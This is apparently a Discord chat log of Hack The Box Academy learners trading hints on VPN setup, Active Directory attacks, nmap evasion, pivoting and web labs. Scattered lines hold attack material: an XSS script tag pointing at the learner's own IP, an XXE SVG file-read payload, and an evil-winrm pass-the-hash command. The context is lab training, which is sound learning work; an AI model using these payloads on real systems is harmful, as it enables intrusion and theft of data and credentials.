Hi, can I DM you about this whitebox pentesting skill assessment? I know endpoint|| \ping|| and|| '{"debug": true, "ip":"Payload"}'|| is the cause. I would love to chat with you and get a nudge ideas off. Thanks

puhhh 😅
I've tried them all, but how I'm suppose to know what to look for.

The flag is in format HTB{fak3_flag}

Sure

@tidal kelp You're like the only person who has actually followed the rules and asked before DMing ❤️

It's a breath of fresh air ik

Any help here?

A big mountain air double lungful

have you considered going through the section slowly and trying everything against the spawned webserver?

the worst part is when you have someone that did ask for permission the first time: but not subsequent times lol

@next bronze you really made me crack your about me. But appreciate the eggplant 👍

Hi, how did you managed to get that user with bloodhound ? I've been trying with both legacy and CE version, and never showed me any session on the host, so would be curious to know how you did it 😄 I can help also on the other questions if you need

Okay , I'm trying to configure the vpn so that I can work better.

On this page
https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access

it say we should have a "Connect to HTB" near our profile picture

I don't have it

that page is more related to https://app.hackthebox.com/

the academy uses a different vpn

and any section that requires the vpn will have a download for it

but if it's a public ip:port then it's not needed

i.e. 94.136.101.26:56004

(note you only need to download the academy vpn once unless you change region)

oh yes thanks..

Indeed, I downloaded it via this page https://academy.hackthebox.com/vpn
then ran: sudo openvpn academy-regular.ovpn
on my kali but it ended with an error

it could be the ipv6 error that some people have had for some reason

yes "Linux can't add IPv6 to interface tun1"

this is the solution

idk why ipv6 is disabled on your device

but it happens

Okay let me try this.
btw I'm using expressvpn , that shouldn't cause any trouble right ?

or should I better desactivate it ?

that's irrelevant

it's literally a case of ipv6 being disabled

which is what switching that /proc/ file from 1 to 0 fixes

Okay, when downloading the vpn connection file,
should I select udp or tcp ?

or it doesn't matter ?

tcp is more stable

to add on that, it's usually better to have VPN using UDP, however in the case of hacking and because you do will likely do scanning and other nasty stuff, having a reliable underlay connection is better. In real life, that comes with a trade off of performances

yep; especially since you do a fair bit of RDP to windows machines

even without switching regions: people have reported increased performance switching from udp -> tcp

Okay udp was selected by default and I first downloaded using it
I was getting some strange failing connection messages.
I use tcp file now, and it is working like a charm, thanks

One last question please

I don't quite understand, what is hapenning,
so I'm now connected to the academy server right?
Why do I need this actually?
it is in combination with this "and any section that requires the vpn will have a download for it" ?
so when a section require a vpn I will get a new ovpn file to download ?

it's a vpn connection, allows to access HTB labs machine which are not accessible on public internet

you don't need to download a new one every time

labs are hosted in the internal network of HTB , vpn put you inside their network so you can use the labs

it's just there to let you know, just in case, that you'll be interacting with a private network

So now I'm in the HTB internal network right ?

after sucessfully runing: sudo openvpn academy-regular.ovpn

yep if you do ip a you should see a tun0 that has an ip such as 10.10.x.x

Oh excellent 😄
tun1 btw,
tun0 is my expressvpn

wow that's so nice

maybe intro to networking will be very helpful for you

then tun1 is the interface you'll use whenever "tun0" is referenced

welcome to the club

also paid vpn services are meh

if someone really wants to they'll just go through it anyway

trust issues ^^

false sense of security ¯_(ツ)_/¯

Hey, can I dm someone about Advanced Deserialization Attacks module? Can't make my Json.Net payload work

only time i'd really feel the need to use a vpn is if i'm attacking an online target

not really, some countries have restrictions over some services, so ppl use VPN to bypass it

true

my example was more personal

ik in some countries anything to do with "hacking" is blocked by isps ¯_(ツ)_/¯

for browsing the web in general , a vpn is also recommended or not ?

not really

cookies are what store your browsing data, not really your ip (some of it is tied to it via geo stuff) but in general all of your data is stored in cookies

You can't trust the VPN providers xD

if you're browsing to a sussy website; then Yes - for sure - use a vpn as a just in case but at the same time. WHY ARE YOU VISITING SUS WEBSITES

haha 😄

Allright guys, thanks a lot

I'm looking at the HTB VIP features.
Currently I'm pursuing the pentest path.
Will the vip subscription be relevant to this path ?

What are these "Retired Machines" for example ?

Retired machines are on the main website

they are machines that have writeups available

and do not count towards any rank progress on the main site

but it's not really needed to learn ¯_(ツ)_/¯

you can practice enumeration and techniques on active boxes

retired machines , comes with writeups so pll use them to learn
active machines are more like competition you can play them to sharp ur skills and get a better rank

but those are in the main platform

you'd need to link your https://app.hackthebox.com/ account to the discord to access more of the server btw (read #welcome )

I think I don't have a https://app.hackthebox.com/ account.
This is different acount from the academy right ?

Can I just create one or is it for VIP member ?

no , you can create it , there's a lot of free stuffs

Okay thanks

Okay I have create an account

there is lot of material there also

That and the academy is maybe too much for me at the same time 😀

I will continue with the academy first

or do you guys recommend another way ?

whatever works for you

some people learn better without a structure

and just google their way through the solution and learning

hi, im stucked in the last part of hacking wp skill assesment (obtain a shell). I would like to know if i can obtain it through the LFI that i already h or need to look for other things. Thx (DONE)

Ah yeah that's right !
I like structure. The academy is great. Well organise and step by step

the labs are a sort of blackbox almost

you just get an IP to scan and a prayer you can figure it out

Marcie, could I get your help again please? (You're gonna hate me soon!)

I'm trying to use msfconsole to exploit a plugin. Although everytime I run it, I keep getting this error

[*] Started reverse TCP handler on 10.10.15.61:4444 
[-] Exploit aborted due to failure: not-found: Failed to retrieve generator
[*] Exploit completed, but no session was created.

I'm assuming my TARGETURI is incorrect? I've changed it to the root of where the || theme || is, and then tried to direct the exploit at the ||template.php|| file too, but no luck.

Reading on ||https://nvd.nist.gov/vuln/detail/CVE-2019-11231|| I don't seem to have a ||theme-edit.php file|| although I have found the ||API Key, but assuming that's to assist with getting Admin access?||

not necessary afaik

also iirc you don't need to change anything

Okay thanks again guys. That was it for me today.
See you tomorrow

oh, so just set the RHOSTS and awauy I go?

and LHOST to your ip

oh my lord.

I'm such an idiot 😄

protip: don't change parameters unless you for-sure know what it does

Noted! Live and learn as they say

i ran sharphound on the computer and transfered the file on my attacking machine

i did managed to get the ms01$ admin hash

now i got a better termilal

and now i got the CT user and hash as well

big progress big time

Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" .exe

Do I need to add this into a file in order to use this? Or Do i do the sudo command?

A little confused on what I need to do here.

Copy paste the first line

Hit enter

Nevermind, I got it!

Copy paste second line, hit enter

Thank you though

Hey Guys , pulling my hair out a little here, Im doing the 'ZAP Fuzzer' part of 'Using Web proxies', i've had no issue setting up the fuzzer with the sec list and the processor to get the MD5 hashes and making the requests however the response is not the cookie which I have set in the request, it is the defualt cookie , I have tried with both GET & POST , any ideas?

Can anyone help me complete the skill assessment of attacking the authentication mechanism? I have obtained the key correctly and also modified the jwt, but I cannot obtain the flag correctly whether I use it in /register or /login.this is url:https://academy.hackthebox.com/module/170/section/1677

That's what i did as well...

And is it not workin

exactly 😄

@umbral fulcrum @fathom pendant I did test double pivot with 2 ligolo instances and 2 tunnels and put it here becuase I believe can be useful to others. Didn't really liked having to switch back & forth, with this approach you can keep both pivots https://www.notion.so/Double-Pivot-with-ligolo-ng-c63a1261f9cb47979f4eceba42eb108c

I would be interested to read it but I need an account

you can log with your google account if any

but I can also unicast to you if you want

If it’s not to much trouble I would like as well please

Why?

https://www.kali.org/tools/bloodhound/
Is it correctly installed?

no I meant, I was able to extract the data, however SQL01 had no user sessions, and no path was found by BH

Hmmmmm

Where did you collected the data and what user?

I collected the data via local admin on SQL01

Try it on another computer then

I managed ot complete the lab, but might try again someday 🙂

thx

AD Enumeration & Attacks - Skills Assessment Part I
Last question: Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

I completed it using ||impacket psexec and pth attack||, but was there any other ways to do it? If you know other methods just dm me

You can also use winrm, but it's doing kind of the same evil-winrm -i 172.16.6.3 -u administrator -H 27dedxxxx

You can see the decrypted text in the debugger after the function (in the final question) is executed, since it needs to load the string it wants to encrypt into a stack (Idk if it is called a stack)

Oh, so it wouldn't be on the text file? It would be in the debugger?

Were you able to find it?

Would you mind sending me some screenshots? I'm not sure where that variable would be located with the string on x64dbg... I played around quite a bit when I first did this module

Hello

I have a problem this exercice : Cross-Site Scripting (XSS) Session Hijacking

I send my XSS et I listen with my php

<script src=http://10.10.14.220:3333></script>

wrong payload btw

I don't understand, misplaced? because I tested all the fields ^^"

Hi I understood that the $ in ||dc01$|| is a separator and nor john nor hashcat can work with it. Do You have any tips that could make this $ count in the hash ?

trying not to give away this answer but i def got this right and HTB is telling me im wrong...

AD Enumeration & Attacks - Skills Assessment Part II. Any idea where to go in this step? Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I can get to that sql server with impacket tools and even get a reverse shell, but I don't have many privs. SeImpersonatePrivilege is enabled, is that viable way, dont really know anything about how to abuse that yet.

Google the privilege 🤷🏼‍♂️

Fairly sure it’s been discussed in the ad module

Look through some of the common exploits in that module, it's discussed there

where i will get fraud bible

complete one

what does the hint say

read #rules

but let me know if you find

what a asked so i11egal

okay, that took a while but it was fun and very great content. thanks to the creator

Doing the file transfer module and I've uploaded the upload_win.zip to the windows machine but I can't extract it to do the hasher command. It always gives me an invalid archive error. I did find an already extracted file and it's hasher value gives an error. Any idea what's wrong?

Full url

That is the full url

yes, but it also said to use PORT instead of the actual port

Ugh.... really

I get everything else right and that's the stupid mistake I made lol

I'm currently working on the DOM-based XSS portion of the XSS module, specifically targeting the TO-DO website. In the write-up, it mentions, "If we try the XSS payload we have been using previously, we will see that it will not execute. This is because the innerHTML function does not allow the use of the <script> tags within it as a security feature."

I'm curious about the security feature mentioned. I can't find any mention of a security feature from innerHTML that prevents running a <script></script>.

In the script.js that the TO-DO website uses, it doesn't employ any input encoding; however, it does use URL decoding.

Could someone help me understand why you CANNOT run a <script>?

Thanks in advance.

I know we are supposed to use another XSS payload, however im only curoius

https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0

its part of the specifications

script elements inserted using innerHTML do not execute when they are inserted.

Hey, so i am doing the module about ACLs and i have a question that says: What is the ObjectAceType of the first right that the forend user has over the GPO Management group?

I am trying to do this in bloodhound to get to know it a little better. But i cant seem to find a way to see permissions over groups? Is there a way to do this in bloodhound?

bloodhound calls the permissions different things than powershell does sometimes

my settings are first node: forend user then the end node of the GPO Management group

but youd go to forend and then select the outbound permissions thingy(idr its exact wording)

yeah i couldnt find it. Trying to see if its easier to do this in powershell

or PowerViewer

thanks

np

hey

anyone here doing bug hunting or pentesting?

not the place for general questions, verify your account with the instructions in #welcome and then you can ask in better channels

some server down again? machines spawn but give no IP

there was some hiccup

Definitely easier. It just requires patience with the command that lists user rights with SID. It takes a few minutes

@here please i am new to using hackthebox and need help with understanding how the Kibanna works for the SOC analyst role.@dpgg

Hi all. Im currently working through the final question of the nmap module, the firewall and IDS IPS evasion hard lab. Can I pick somones brain to check if I'm on the right lines?

@here is blocked for pleb users.

Source-port is gonna be a main source of your woes

The other is gonna be a Syn

Yeah it was def easier. I think i need to read the acl article a few more times just to understand it a bit better. I understand that its a way to limit user action based on domain permissions and groups but thats all i’ve understood so far

At least all i can remember now

I mean, that's basically it. Just sometimes, some users are a bit more special than others

Bloodhound was def good to elevate privledges tho. Understanding the exploit chain better

Also it was neat to have that help option to see examples of ways to exploit. Like applyself or genericall ect

I'm gunna assume trying UDP ports is th e wrong line of thought then

But what confused me a little is that: is a user apart of a group or a group apart of a user. Or i guess it can be both but yeah

scratch that

let me think on it some more ill come back to you

A syn scan of all ports with the right source-port will reveal a lot

So can I only use socks5 with port 1080?
I tried using 7000 but it was not working
I changed the proxy for socks5 in proxychains.conf
socks5 127.0.0.1 7000
It is not working

because there’s no proxy server that supports socks5 listening on that port

So the sock values have to be constant during tunneling?

Hello, I was working on solving the Footprint Lab - Hard machine. I connected to the machine via SSH and then discovered MySQL inside the machine. I connected to it, but couldn't find anything. Do you have any suggestions? Where else can I look? I thought I had checked everything thoroughly, but I seem to have missed something.

Like 9050 for socks4 snd 1080 for socks5?

You need to look at it as admin

Oh wait mysql on hard

comeon, I'm still not getting any IPs, am I alone?

Just look around for databases @cedar yew

show databases; should be your start

whatever version set up on the proxy server

should be in your config file also

oh now works

I edited the proxychains file and used --socks5 on chisel server

yeap I've already searched extensively, but couldn't find any information. I wonder if I need to escalate privileges. I've checked everywhere inside the database.

Then you found a second user, yes?

Maybe switching your perspective will help

Is there any way to change the socks ports? Just asking for curiosity

yeap 3 user but we have 1 user

Google

If I recall, one of the databases you can view has creds

I tried asking gpt it said it will work I think I gotta look for into it
Thanks guys for the help

And if you check the /home/ directory then you'll see what I mean

ChatGPT is a crock of shit lol

Yea but good for asking simple stuff

oky im searching

look into the help page of chisel and see what proxy types it supports and how to configure it

Ok

and bum footprint module finish 🙂

ez

The brick wall had a door right next to where you were stuck huh.

Footprinting module is one of my favs

😦

Lots of enumeration

i like this module

It helps reinforce the enumeration methodology

Yea learned a ton in there

thx for helping @fathom pendant

My fave skill labs are the password attack ones, specifically the hard one, bouncing back and forth

Showcasing the step-by-step break-in

Active directory rooms interest me.

Im doing the pw attack rn, right now i dont enjoy it :/

Some of the sections are meh, bc of the waiting

My biggest thing is the question with Will. But that's just bc it adds an extra layer of "wait who tf is ||kira||"

Yeah had to brute for 20 minutes on the mutations

I dont get it

dont call em rooms or youll get bullied 💀

Poked with a stick

I was resisting the urge

Got it, I'll be careful.

Credential Hunting with Linux section

Without the hint you're kinda just stuck for a bit

Ah got it

Im being tongue in cheek, but its a THM specific lingo and THM is generally looked on...poorly lol

Aside from throwing both wordlists at it ofc

Top 1%

I got top 6% for just doing the holiday event last year

and nothing else lmao

hahaha I'm trying to learn too

I quit THM bc its too playful, wanted just pure technicals

Htb is 🐐

yess thm is a similar game

ok so I did what you said using the only logical source port, now i found another port that could be of interest, but using -sSV, or -A flags doesnt return any version results. Should i use a script?

Sorry if im asking to much but I am hitting a wall here and I dont know how many more times i can read over my notes ha

-sS and -p-

Sometimes you need to manually connect to a port

Nmap isn't always gonna give the answer

I guess the port I foudn isnt the one then, cos i tried to connect to the port I thought was the interesting one and got permission denied

You need to connect with a source port too

yeah I did the -sS flag btu looks like i forgot a -p- so ill add that

yeah i tried with the source port and got same thign, so must be the wrong port i think

Maybe

It's a high port number fwiw

The ids/ips evasion section regarding proxying will be more helpful

yeah it is a pretty port number high number. more than 4 digits, but ill do more digging, thanks for the tips

While it refers to a specific port, the method works to check all

That should be the port then

Sounds like the dns and nmap evasion part, was pretty fun

Replace the actual port with [port] and paste your command here

Wrap it in `

has anyone completed the File upload module ?

i'm doing the assessment

Hey guys, sorry I'm new here, can any one explain how we can identify the number of transfer zones?
module: INFORMATION GATHERING - WEB EDITION

nope nobody has ever completed the module

Liar 🤥

Localhost

Dig axfr

axfr

I think the issue was i didnt sudo when i manually connected LOL

I already run it, but from the output perspective, which lines guides to the zones?

Yeah the source-port is a bound port so sudo is needed

I just did it and it worked, feel so dumb hahaha

that explains the permission denied

thanks alot for your help ha

Anyone unable to login to the windows server with htb provided credentials? This is for Guided Lab Part 1 under Introduction to Active Directory module

???

im so new at this i cant even find bash in the tutorial

'Password'

$

The word you're looking for is "terminal"

there’re a few of them here

whats up?

??

hello

i just registered to htbox and i have 0-1 spawns left so i can continue, when will it refill?

Tomorrow

I'm having issues with the file upload assessment

Hi, I'm working on the Exploiting Web Vulnerabilities in Thick-Client Applications. It seems like there isn't any solution. When I change the port number in beans.xml and recompile that way, the connect button doesn't change any requests.
If I also delete all the entries in META-INF/MANIFEST, as instructed in the section, and then recompile, I get a JNI error for some reason.
Any suggestions?

im new to this im looking for someone to coach me or to guide me, is there anyone?

idk what im looking for this is what its asking me
"Click the Start Instance button
Try to locate the bash terminal icon and click it"

Free users on academy get one pwnbox spawn per day

not unless you sub

No one is gonna coach you privately

can i ask here alot of questions?

the green button thatsays start instance on the page

when i upload the .jpg file it works but when i create the shell.svg file it doesn't load at all and i remove the file type and persmissions in the dev console

If it's related to academy modules, yes. But be sure you can't Google the answer first

you can but doesnt mean theyl be answered

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>```

i pressed start instance but i cant find where the icon is after that

thats the payload i use

i have general questions because there are many courses and i consider subscribe

Start instance isn't the same as spawn target

i followed 3 youtube videos in a series to learn linux, of "network chuck"

are you using burp?

i have no idea what spawn target is

Getting Started is a good module to teach you how academy works

But on the page, if there's an interactive target, there's green text that says "Click here to spawn target"

It won't be in the instance window

thank you ill start with this

The instance window is just HTB's in-browser vm, Pwnbox

Whenever you see pwnbox, it's referring to that vm

Yessir I’m trying to upload that payload and intercept with burp but when I try to upload the .svg file it doesn’t upload

thank you i will start this course now. can i ask please what are the best modules to learn to find a job?

There's none that will guarantee you a job

i want to learn how to hack

That's very broad

There's web hacking aka bounty hunting, and domain hacking, generally red teaming

This is very hostile dude

this made me giggle

i am just asking man

Still comes off as edgy and rude

you’re on the right track

not everyone has seen the same movies as you to get it ¯_(ツ)_/¯

you guys learned a lot of modules from the htbox?

I figure but that not the first .svg payload I tried and nothing I’m doing is working

and movies too

Modules, prior knowledge, using critical thinking

can you give me tips on what to do if i just started to make my learning procces efficent

that payload

Take notes

Not working for me on parrot 🦜 os or kali